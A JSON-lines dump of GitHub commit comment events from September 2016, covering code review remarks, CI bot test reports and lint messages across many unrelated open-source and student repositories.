{"id":"4599475900","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19122240,"position":null,"line":null,"path":null,"commit_id":"baa7b90f2e01bc32763d7d52c86fe3ea06d4583d","created_at":"2016-09-21T23:01:32Z","updated_at":"2016-09-21T23:01:32Z","body":"FixTransitionRules (nmerket) - x86_64-MacOS-10.9-clang: OK (2316 of 2330 tests passed, 11 test warnings)\n\n * 11 tests had: EIO diffs.\n * 9 tests had: ESO small diffs.\n * 14 tests had: AUD diffs.\n * 15 tests had: ERR diffs.\n * 13 tests had: Table big diffs.\n * 7 tests had: ESO big diffs.\n * 2 tests had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 1 test had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: RDD diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n * 3 tests had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baa7b90f2e01bc32763d7d52c86fe3ea06d4583d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baa7b90f2e01bc32763d7d52c86fe3ea06d4583d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.4%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T23:01:32Z"}
{"id":"4599477770","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19122246,"position":26,"line":43,"path":"components/decorateMapComponent.js","commit_id":"4640109a0ba3e8e86dee769c711543e4eac2704b","created_at":"2016-09-21T23:02:01Z","updated_at":"2016-09-21T23:02:01Z","body":"This line is violating `max-len`?"}},"created_at":"2016-09-21T23:02:01Z"}
{"id":"4599480047","type":"CommitCommentEvent","actor":{"login":"HichamDiouri"},"repo":{"name":"montreality88/projet-de-session-A2016"},"payload":{"comment":{"id":19122255,"position":null,"line":null,"path":null,"commit_id":"3db68cff66cc3e34276d01fdddfc54074a1fdd1f","created_at":"2016-09-21T23:02:38Z","updated_at":"2016-09-21T23:02:38Z","body":"Copie du fichier JSON"}},"created_at":"2016-09-21T23:02:38Z"}
{"id":"4599480284","type":"CommitCommentEvent","actor":{"login":"Gabrielle0915"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19122256,"position":32,"line":71,"path":"equaldigit.py","commit_id":"2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960","created_at":"2016-09-21T23:02:41Z","updated_at":"2016-09-21T23:02:41Z","body":"I just checked the codes of investigator and the two outside labs, only outside lab 2 does not has \"1 - \". That one is removed by me to calculate the probability of the  percentage is equal to or lower than the boundary(You asked me the exact value of the probability yesterday) and forgot to added it back. I have already fixed the code.\n\nThe paper uses the probability of the percentage equal to or greater than the boundary as a measurement. binomial.cdf(x, n) calculate the probability of percentage <= x/n. Now we want p(percentage >= x/n), which is 1 - p(percentage <= (x-1)/n) (binomial test is discrete). Therefore, we include a “1 - “ in the calculation and “- 1” in the parameter.\n> On Sep 21, 2016, at 2:11 PM, tmaurer13 <notifications@github.com> wrote:\n> \n> Wait, so for other investigators and the two outside labs, there's no \"1 - \" before the binomial. And where does the \" - 1\" get included in the argument of the binomial? (sorry for all the questions, I'm trying to add this test to the permutation test right now and I want to make sure I don't screw anything up)\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/sudatta0993/STAT_215_Project_1/commit/2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960#commitcomment-19120800>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AS5RvWhkCnXmmBO3uRd9604Ik6--6uiKks5qsZ1wgaJpZM4KDP0W>.\n> \n\n"}},"created_at":"2016-09-21T23:02:41Z"}
{"id":"4599483697","type":"CommitCommentEvent","actor":{"login":"tavaughan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":19122272,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-21T23:03:38Z","updated_at":"2016-09-21T23:03:38Z","body":"Ok, but wouldn't the translation still depend heavily on the orientation of the sensor? The translation could go in any direction, depending on the sensor's orientation, right?"}},"created_at":"2016-09-21T23:03:38Z"}
{"id":"4599485411","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"glennsarti/facter"},"payload":{"comment":{"id":19122280,"position":8,"line":40,"path":"acceptance/lib/facter/acceptance/user_fact_utils.rb","commit_id":"1a6db3a52ee98cd818ce589abb9be167bb4cbf57","created_at":"2016-09-21T23:04:03Z","updated_at":"2016-09-21T23:04:03Z","body":"Facter 3.0 shipped in Puppet 4.2.0.  Server 2003 is supported in Puppet 4.2.x.  However we don't test 2003 in our acceptance matrix.  All other Windows Platforms are 6.0+.\r\n\r\nIn practice we could remove these guards and not break any tests."}},"created_at":"2016-09-21T23:04:03Z"}
{"id":"4599490613","type":"CommitCommentEvent","actor":{"login":"mathewlippincott"},"repo":{"name":"OpenWaterProject/openwaterproject.github.io"},"payload":{"comment":{"id":19122298,"position":11,"line":98,"path":"index.html","commit_id":"f0fe75e4bddc495916d53347631e112c9e42373a","created_at":"2016-09-21T23:05:30Z","updated_at":"2016-09-21T23:05:30Z","body":"Move Public Lab Wiki up to top, and point to \"how to contribute\" on the wiki or other updated \"how to contribute\" file from a repository."}},"created_at":"2016-09-21T23:05:30Z"}
{"id":"4599492910","type":"CommitCommentEvent","actor":{"login":"flar2"},"repo":{"name":"flar2/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19122312,"position":null,"line":null,"path":null,"commit_id":"a2b70865948a7c1bc5e1a2a69797aa865c96d45e","created_at":"2016-09-21T23:06:07Z","updated_at":"2016-09-21T23:06:07Z","body":"The policy is shared by all CPUs in a cluster, so it's only necessary to send a value for one CPU per cluster.\r\n\r\nOnePlus powerhal is actually sending values for each cpu:\r\n2:1036800 3:1036800\r\n0:1036800 1:1036800\r\n0:0 1:0\r\n2:0 3:0\r\n\r\nBut the code near the end of the function will skip updating policy.min for CPU 1 and 3 if they have the same values as CPU 0 and 2. \r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-21T23:06:07Z"}
{"id":"4599495410","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19122322,"position":null,"line":null,"path":null,"commit_id":"a63f3a3b09fae2a9dfe330fd7fbde1b158686eff","created_at":"2016-09-21T23:06:46Z","updated_at":"2016-09-21T23:06:46Z","body":"I see that happening too, the not showing Betterttv settings.  I also noticed that when loading a channel from the directory the chat room state is shown at the top, but refreshing the channel page causes them to not show anymore"}},"created_at":"2016-09-21T23:06:46Z"}
{"id":"4599497947","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"andip71/boeffla-kernel-cm-oneplusx"},"payload":{"comment":{"id":19122332,"position":null,"line":null,"path":null,"commit_id":"79000e94db7082b5f4e8336a863991be8d6513dc","created_at":"2016-09-21T23:07:29Z","updated_at":"2016-09-21T23:07:29Z","body":"Hey man, brilliant work here.  I promise to credit you with the work (my kernel clearly states like the two pieces of code I actually wrote, the rest is \"borrowed\"), but is there a trick to setting the hard limits from cli and getting them to stick that I'm not aware of? If trade secret you'd rather not share, I completely understand.  If it's something you'd be willing to discuss in private, feel free to message me at robpatershuk@gmail.com.\r\nHard limits are fun : D After numerous failed attempts, I finally have a working cpu implementation on the galaxy s4!\r\nBig fan of your work, thanks for the work you've done and letting this nerd (me) learn so much from your efforts."}},"created_at":"2016-09-21T23:07:29Z"}
{"id":"4599500064","type":"CommitCommentEvent","actor":{"login":"kristoferjoseph"},"repo":{"name":"Raynos/min-document"},"payload":{"comment":{"id":19122334,"position":14,"line":338,"path":"test/test-document.js","commit_id":"eb710ff5eb773dd20a1d2a0edda09fbbd5cfb153","created_at":"2016-09-21T23:07:48Z","updated_at":"2016-09-21T23:07:48Z","body":"[This makes me happy af!](https://media.tenor.co/images/76490e1751fb6128d5920b6e6bb5d708/raw)\r\n\r\nThank you kindly 🙌"}},"created_at":"2016-09-21T23:07:48Z"}
{"id":"4599505979","type":"CommitCommentEvent","actor":{"login":"gilbox"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19122352,"position":26,"line":43,"path":"components/decorateMapComponent.js","commit_id":"4640109a0ba3e8e86dee769c711543e4eac2704b","created_at":"2016-09-21T23:09:23Z","updated_at":"2016-09-21T23:09:23Z","body":"it violates b/c of the eslint comment"}},"created_at":"2016-09-21T23:09:23Z"}
{"id":"4599508720","type":"CommitCommentEvent","actor":{"login":"gilbox"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19122359,"position":26,"line":43,"path":"components/decorateMapComponent.js","commit_id":"4640109a0ba3e8e86dee769c711543e4eac2704b","created_at":"2016-09-21T23:10:10Z","updated_at":"2016-09-21T23:10:10Z","body":"![image](https://cloud.githubusercontent.com/assets/2136203/18732162/dcdbc784-8015-11e6-8175-7c5f5493c098.png)\r\n"}},"created_at":"2016-09-21T23:10:10Z"}
{"id":"4599514128","type":"CommitCommentEvent","actor":{"login":"gilbox"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19122377,"position":4,"line":4,"path":"components/ProviderPropType.js","commit_id":"2d37a79a43f3239086b0dab8678305be2b21fc1e","created_at":"2016-09-21T23:11:41Z","updated_at":"2016-09-21T23:11:41Z","body":"oops, changed my mind and forgot to delete it. It's exposed as a one-liner in `MapView.js`"}},"created_at":"2016-09-21T23:11:41Z"}
{"id":"4599516506","type":"CommitCommentEvent","actor":{"login":"Ameobea"},"repo":{"name":"Ameobea/Calculator-Programs"},"payload":{"comment":{"id":19122384,"position":null,"line":null,"path":null,"commit_id":"e40842b3975e9cb4b8a37561c2cac224f31cc182","created_at":"2016-09-21T23:12:23Z","updated_at":"2016-09-21T23:12:23Z","body":"@dalexj https://ameo.link/u/35g.png noob"}},"created_at":"2016-09-21T23:12:23Z"}
{"id":"4599518767","type":"CommitCommentEvent","actor":{"login":"Gabrielle0915"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19122395,"position":32,"line":71,"path":"equaldigit.py","commit_id":"2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960","created_at":"2016-09-21T23:13:01Z","updated_at":"2016-09-21T23:13:01Z","body":"I just checked the code on Github and find that I did not git push new results when I made some changes. You are so careful and thanks for telling me.\n\nSince the percentage of those 3 datasets are lower than expected, I used p(percentage <= x/n) as measurement at first. However, when I wrote the thesis, I change the measurement to p(percentage >= x/n) no matter whether the percentage is greater than expected to keep the consistence of the measurement.(This is the measurement chosen by the paper). Sorry about do not git push immediately.\n\nBest,\nMengyu\n> On Sep 21, 2016, at 2:11 PM, tmaurer13 <notifications@github.com> wrote:\n> \n> Wait, so for other investigators and the two outside labs, there's no \"1 - \" before the binomial. And where does the \" - 1\" get included in the argument of the binomial? (sorry for all the questions, I'm trying to add this test to the permutation test right now and I want to make sure I don't screw anything up)\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/sudatta0993/STAT_215_Project_1/commit/2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960#commitcomment-19120800>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AS5RvWhkCnXmmBO3uRd9604Ik6--6uiKks5qsZ1wgaJpZM4KDP0W>.\n> \n\n"}},"created_at":"2016-09-21T23:13:01Z"}
{"id":"4599519125","type":"CommitCommentEvent","actor":{"login":"volodymyrpekh"},"repo":{"name":"TedGoas/Cerberus"},"payload":{"comment":{"id":19122397,"position":88,"line":184,"path":"cerberus-hybrid.html","commit_id":"95ab4cfa9d5daa4e0b749520ffa4f878d2a12b95","created_at":"2016-09-21T23:13:07Z","updated_at":"2016-09-21T23:13:07Z","body":"Hi @TedGoas \r\n\r\nJust have a question about this commit to hybrid template. Why do you add height and font attributes to all images? Was there any issue? Template worked pretty well. I would appreciate your comments and thoughts on this. \r\n\r\nThank you in advance!\r\n "}},"created_at":"2016-09-21T23:13:07Z"}
{"id":"4599519265","type":"CommitCommentEvent","actor":{"login":"ruimarinho"},"repo":{"name":"ruimarinho/eslint-test"},"payload":{"comment":{"id":19122398,"position":4,"line":null,"path":"index.js","commit_id":"d31380ce36c135838c868f9a5642ee1b0f7edba8","created_at":"2016-09-21T23:13:09Z","updated_at":"2016-09-21T23:13:09Z","body":"**no-cond-assign**: Unexpected assignment within an 'if' statement."}},"created_at":"2016-09-21T23:13:09Z"}
{"id":"4599519266","type":"CommitCommentEvent","actor":{"login":"ruimarinho"},"repo":{"name":"ruimarinho/eslint-test"},"payload":{"comment":{"id":19122399,"position":4,"line":null,"path":"index.js","commit_id":"d31380ce36c135838c868f9a5642ee1b0f7edba8","created_at":"2016-09-21T23:13:09Z","updated_at":"2016-09-21T23:13:09Z","body":"**space-in-parens**: There should be no spaces inside this paren."}},"created_at":"2016-09-21T23:13:09Z"}
{"id":"4599519267","type":"CommitCommentEvent","actor":{"login":"ruimarinho"},"repo":{"name":"ruimarinho/eslint-test"},"payload":{"comment":{"id":19122400,"position":4,"line":null,"path":"index.js","commit_id":"d31380ce36c135838c868f9a5642ee1b0f7edba8","created_at":"2016-09-21T23:13:09Z","updated_at":"2016-09-21T23:13:09Z","body":"**quotes**: Strings must use singlequote."}},"created_at":"2016-09-21T23:13:09Z"}
{"id":"4599519268","type":"CommitCommentEvent","actor":{"login":"ruimarinho"},"repo":{"name":"ruimarinho/eslint-test"},"payload":{"comment":{"id":19122401,"position":4,"line":null,"path":"index.js","commit_id":"d31380ce36c135838c868f9a5642ee1b0f7edba8","created_at":"2016-09-21T23:13:09Z","updated_at":"2016-09-21T23:13:09Z","body":"**space-in-parens**: There should be no spaces inside this paren."}},"created_at":"2016-09-21T23:13:09Z"}
{"id":"4599519269","type":"CommitCommentEvent","actor":{"login":"ruimarinho"},"repo":{"name":"ruimarinho/eslint-test"},"payload":{"comment":{"id":19122402,"position":4,"line":null,"path":"index.js","commit_id":"d31380ce36c135838c868f9a5642ee1b0f7edba8","created_at":"2016-09-21T23:13:09Z","updated_at":"2016-09-21T23:13:09Z","body":"**no-undef**: 'user' is not defined."}},"created_at":"2016-09-21T23:13:09Z"}
{"id":"4599519919","type":"CommitCommentEvent","actor":{"login":"rm0016nc"},"repo":{"name":"rm0016nc/bubble"},"payload":{"comment":{"id":19122404,"position":null,"line":null,"path":null,"commit_id":"2874d6efc585cabac6d5c074c8f286e593fdf842","created_at":"2016-09-21T23:13:20Z","updated_at":"2016-09-21T23:13:20Z","body":"Hello people"}},"created_at":"2016-09-21T23:13:20Z"}
{"id":"4599521124","type":"CommitCommentEvent","actor":{"login":"0e4ef622"},"repo":{"name":"KeyboardFire/snowman-lang"},"payload":{"comment":{"id":19122407,"position":null,"line":null,"path":null,"commit_id":"8e91337574b7385a6089654f8a1f37dfde5b793a","created_at":"2016-09-21T23:13:40Z","updated_at":"2016-09-21T23:13:40Z","body":"yes"}},"created_at":"2016-09-21T23:13:40Z"}
{"id":"4599522175","type":"CommitCommentEvent","actor":{"login":"jedipi"},"repo":{"name":"mvantellingen/python-zeep"},"payload":{"comment":{"id":19122412,"position":null,"line":null,"path":null,"commit_id":"d44f3fc73f6f2a9b567be3ece077d018cc49cfa6","created_at":"2016-09-21T23:13:57Z","updated_at":"2016-09-21T23:13:57Z","body":"here is an example of a response that is failing\r\nhttps://gist.github.com/jedipi/1ec2d7b284a50a33112005ff1f257d60"}},"created_at":"2016-09-21T23:13:57Z"}
{"id":"4599522550","type":"CommitCommentEvent","actor":{"login":"gravyboat"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19122417,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-21T23:14:03Z","updated_at":"2016-09-21T23:14:03Z","body":"Thanks for reverting @cdrage. @scottbernstein Please fork the repo then branch in your repo, then open a PR against the main streamlink repo. That let's us review it, confirm tests look good, and then get it merged in."}},"created_at":"2016-09-21T23:14:03Z"}
{"id":"4599524715","type":"CommitCommentEvent","actor":{"login":"cydh"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19122422,"position":205,"line":4449,"path":"src/map/npc.c","commit_id":"c7fd6a0ce913ef9b47bb8e110831d1e967d98cae","created_at":"2016-09-21T23:14:34Z","updated_at":"2016-09-21T23:14:34Z","body":"I don't free it, it just pointer, the `ev` is created and freed in other part."}},"created_at":"2016-09-21T23:14:34Z"}
{"id":"4599526416","type":"CommitCommentEvent","actor":{"login":"cydh"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19122430,"position":157,"line":4401,"path":"src/map/npc.c","commit_id":"c7fd6a0ce913ef9b47bb8e110831d1e967d98cae","created_at":"2016-09-21T23:15:03Z","updated_at":"2016-09-21T23:15:03Z","body":"yea useless"}},"created_at":"2016-09-21T23:15:03Z"}
{"id":"4599534475","type":"CommitCommentEvent","actor":{"login":"DawitTekie"},"repo":{"name":"DawitTekie/acmgithubworkshop"},"payload":{"comment":{"id":19122448,"position":null,"line":null,"path":null,"commit_id":"57f562df44f2745e54c3cced5c3728da246fb430","created_at":"2016-09-21T23:17:24Z","updated_at":"2016-09-21T23:17:24Z","body":"hello people"}},"created_at":"2016-09-21T23:17:24Z"}
{"id":"4599535187","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19122450,"position":null,"line":null,"path":null,"commit_id":"2ea106efacc9558d00669badf7fcfe9356f35ce1","created_at":"2016-09-21T23:17:35Z","updated_at":"2016-09-21T23:17:35Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NTh5Vz9_Q0-GKp-ldoF1BA"}},"created_at":"2016-09-21T23:17:35Z"}
{"id":"4599547268","type":"CommitCommentEvent","actor":{"login":"JeetKunDoug"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19122511,"position":84,"line":106,"path":"src/riak_kv_pb_index.erl","commit_id":"ccb019fdc02ad545a9914adc391c56d423550630","created_at":"2016-09-21T23:21:05Z","updated_at":"2016-09-21T23:21:05Z","body":"So the Google Protobufs language guide states that an optional bool without its value set should default to `false.` I'm guessing this is another of our incompatibilities?\r\n\r\nSee https://developers.google.com/protocol-buffers/docs/proto#optional for more information.\r\n\r\nObviously, we'll have to fix this for 2.2 (cc @fadushin - see https://github.com/basho/riak_kv/pull/1483 for a fix) but do you know if the new protobuf library we're moving towards will handle this correctly (from a \"Google says this is the behavior\" perspective)?"}},"created_at":"2016-09-21T23:21:05Z"}
{"id":"4599548569","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19122519,"position":null,"line":null,"path":null,"commit_id":"a601645c36749607ff70b449cc9fa452448f7dab","created_at":"2016-09-21T23:21:27Z","updated_at":"2016-09-21T23:21:27Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-MacOS-10.9-clang: OK (2328 of 2333 tests passed, 8 test warnings)\n\n * 3 tests had: AUD diffs.\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 7 tests had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T23:21:27Z"}
{"id":"4599552395","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"bmatcuk/doublestar"},"payload":{"comment":{"id":19122529,"position":13,"line":76,"path":"doublestar.go","commit_id":"d1c558fae99034adac78490a5b3082b0c9cd35e0","created_at":"2016-09-21T23:22:30Z","updated_at":"2016-09-21T23:22:30Z","body":"Seems like this was unintentionally left hard-coded as `/` instead of relying on `os.PathSeparator`."}},"created_at":"2016-09-21T23:22:30Z"}
{"id":"4599553531","type":"CommitCommentEvent","actor":{"login":"xlab"},"repo":{"name":"Whiplash777/cgogen"},"payload":{"comment":{"id":19122534,"position":null,"line":null,"path":null,"commit_id":"ce6cef3a5c56da7c4d87379c35594a413418b024","created_at":"2016-09-21T23:22:49Z","updated_at":"2016-09-21T23:22:49Z","body":"I've introduced a critical bug in this commit, please update your fork to the upstream master."}},"created_at":"2016-09-21T23:22:49Z"}
{"id":"4599555118","type":"CommitCommentEvent","actor":{"login":"xlab"},"repo":{"name":"vicever/cgogen"},"payload":{"comment":{"id":19122541,"position":null,"line":null,"path":null,"commit_id":"ce6cef3a5c56da7c4d87379c35594a413418b024","created_at":"2016-09-21T23:23:15Z","updated_at":"2016-09-21T23:23:15Z","body":"I've introduced a critical bug in this commit, please update your fork to the upstream master."}},"created_at":"2016-09-21T23:23:15Z"}
{"id":"4599555222","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19122542,"position":20,"line":239,"path":"otrv4.md","commit_id":"d188bf58842e839a856f9427f32c6fbbd7748648","created_at":"2016-09-21T23:23:16Z","updated_at":"2016-09-21T23:23:16Z","body":"This is confusing because it implies KDF takes 2 parameters, rather than one (as in double_ratchet spec). It would be better to have:\r\n\r\n```\r\nRi, Hi, Cai_0, Cbi_0 = KDF(HMAC-HASH(Ri-1, ECDH(privDHRs, pubDHRr)))\r\n```\r\n\r\nOr, in our case:\r\n\r\n```\r\nNewSharedSecret = SHA3(Ri-1 || ECDH(privDHRs, pubDHRr))\r\nRi, Hi, Cai_0, Cbi_0 = KDF(NewSharedSecret)\r\n```"}},"created_at":"2016-09-21T23:23:16Z"}
{"id":"4599556147","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"bmatcuk/doublestar"},"payload":{"comment":{"id":19122544,"position":31,"line":167,"path":"doublestar.go","commit_id":"d1c558fae99034adac78490a5b3082b0c9cd35e0","created_at":"2016-09-21T23:23:32Z","updated_at":"2016-09-21T23:23:32Z","body":"Noticed that we could bypass the first element in `patternComponents` since we're already relative to whatever the root dir is."}},"created_at":"2016-09-21T23:23:32Z"}
{"id":"4599556165","type":"CommitCommentEvent","actor":{"login":"xlab"},"repo":{"name":"bestwpw/cgogen"},"payload":{"comment":{"id":19122545,"position":null,"line":null,"path":null,"commit_id":"ce6cef3a5c56da7c4d87379c35594a413418b024","created_at":"2016-09-21T23:23:32Z","updated_at":"2016-09-21T23:23:32Z","body":"I've introduced a critical bug in this commit, please update your fork to the upstream master."}},"created_at":"2016-09-21T23:23:32Z"}
{"id":"4599563885","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19122566,"position":null,"line":null,"path":null,"commit_id":"c68b4297923893da10611ee856944ed40ffe3373","created_at":"2016-09-21T23:25:44Z","updated_at":"2016-09-21T23:25:44Z","body":"develop (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-21T23:25:44Z"}
{"id":"4599564710","type":"CommitCommentEvent","actor":{"login":"diffshare"},"repo":{"name":"cat-in-136/redmine_scheduling_poll"},"payload":{"comment":{"id":19122568,"position":3,"line":15,"path":"app/models/scheduling_poll_item.rb","commit_id":"6cb10ddfeb023c577fe3d193947750db71425b62","created_at":"2016-09-21T23:25:57Z","updated_at":"2016-09-21T23:25:57Z","body":"試していないけれども、\r\nSchedulingPollItemでSchedulingVoteを通してのUserの関係性の参照する場合は、SchedulingPollItemで\r\nhas_many :users, through: :scheduling_vote\r\nと書いた方がいいかも\r\n"}},"created_at":"2016-09-21T23:25:57Z"}
{"id":"4599564830","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19122569,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-21T23:25:58Z","updated_at":"2016-09-21T23:25:58Z","body":"Je ne sais pas."}},"created_at":"2016-09-21T23:25:58Z"}
{"id":"4599567035","type":"CommitCommentEvent","actor":{"login":"lukesampson"},"repo":{"name":"lukesampson/scoop"},"payload":{"comment":{"id":19122579,"position":3,"line":7,"path":"bucket/imagemagick.json","commit_id":"b6bdadb37f86144330e58e46a1552dc3b050ceb9","created_at":"2016-09-21T23:26:35Z","updated_at":"2016-09-21T23:26:35Z","body":"Done (23cec3f)"}},"created_at":"2016-09-21T23:26:35Z"}
{"id":"4599576638","type":"CommitCommentEvent","actor":{"login":"httpdigest"},"repo":{"name":"code-disaster/lwjgl3"},"payload":{"comment":{"id":19122604,"position":177,"line":177,"path":"modules/core/src/test/java/org/lwjgl/demo/bgfx/Raymarch.java","commit_id":"8222b5e1d96dd2d7e2694990a163ee86df92ad1d","created_at":"2016-09-21T23:29:18Z","updated_at":"2016-09-21T23:29:18Z","body":"The latest 1.8.4-SNAPSHOT contains `Matrix4f.setOrthoLH()`.\r\nTo produce a Direct3D-compatible left-handed orthographic projection matrix with Direct3D's z-range = 0..1 instead of OpenGL's -1..+1, use the additional overload with the boolean parameter `zZeroToOne` = true.\r\nThis will produce m32 = 0.0f correctly."}},"created_at":"2016-09-21T23:29:18Z"}
{"id":"4599586237","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19122629,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-21T23:31:59Z","updated_at":"2016-09-21T23:31:59Z","body":"This may be a really stupid question, but if two items are comparable using\na Less() method returning a bool, does it automatically mean that they are\nalso comparable for equality? Or does my method necessarily need to address\nall three cases <, >, and ==? (for example when searching for the presence\nof a value in a bst I need to be able to check for equality)\n\nThanks!\n\nOn Wed, Sep 21, 2016 at 12:22 PM, Joe Tsai <notifications@github.com> wrote:\n\n> In the case where you depend on some specific behavior for the items, then\n> yes. Binary tree is a good example where you need a Less method.\n>\n> Keep in mind that even in a statically typed language with generics, you\n> still need to declare what \"behavior\" that your input requires. The main\n> thing is that those other languages typically have built-in methods. For\n> example, the '<' operator would be syntactic sugar for just calling the\n> Less method. If Go ends up supporting generics, I'm fairly certain that\n> every primitive type in Go will have built-in methods.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19117305>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib1y2PquoAr-gSA8SkB2zHBKNns1BTks5qsWfGgaJpZM4KCOtE>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-21T23:31:59Z"}
{"id":"4599590931","type":"CommitCommentEvent","actor":{"login":"Magisus"},"repo":{"name":"glennsarti/facter"},"payload":{"comment":{"id":19122636,"position":63,"line":63,"path":"acceptance/tests/options/config_file/ttls.rb","commit_id":"1a6db3a52ee98cd818ce589abb9be167bb4cbf57","created_at":"2016-09-21T23:33:21Z","updated_at":"2016-09-21T23:33:21Z","body":"This message actually comes from the JSON resolver, which is also used to load external JSON facts. A better message to match against would be \"loading cached values for .+ fact\"."}},"created_at":"2016-09-21T23:33:21Z"}
{"id":"4599592232","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19122640,"position":11,"line":546,"path":"components/MapView.js","commit_id":"1a3c8197093ed39730514460c60a60788189ac6c","created_at":"2016-09-21T23:33:45Z","updated_at":"2016-09-21T23:33:45Z","body":"Under what circumstances will this not be present?"}},"created_at":"2016-09-21T23:33:45Z"}
